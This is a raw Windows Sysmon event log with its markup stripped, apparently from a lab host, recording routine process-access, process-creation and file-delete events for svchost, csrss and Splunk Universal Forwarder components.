08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:25.047{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.047{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.031{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:25.032{0C1E0330-F6D5-60EB-B379-00000000D001}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000809244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809241Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809240Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809239Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.938{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809238Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.922{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809237Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.922{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809236Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.922{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809235Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.923{0C1E0330-F6D6-60EB-B679-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809234Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=923CB4F0D667D646BE12285618C91AF0,SHA256=27F06980E23D42620B5C45724E2B5662B2B2C2229C9248C8776D9E07289B9960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809233Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
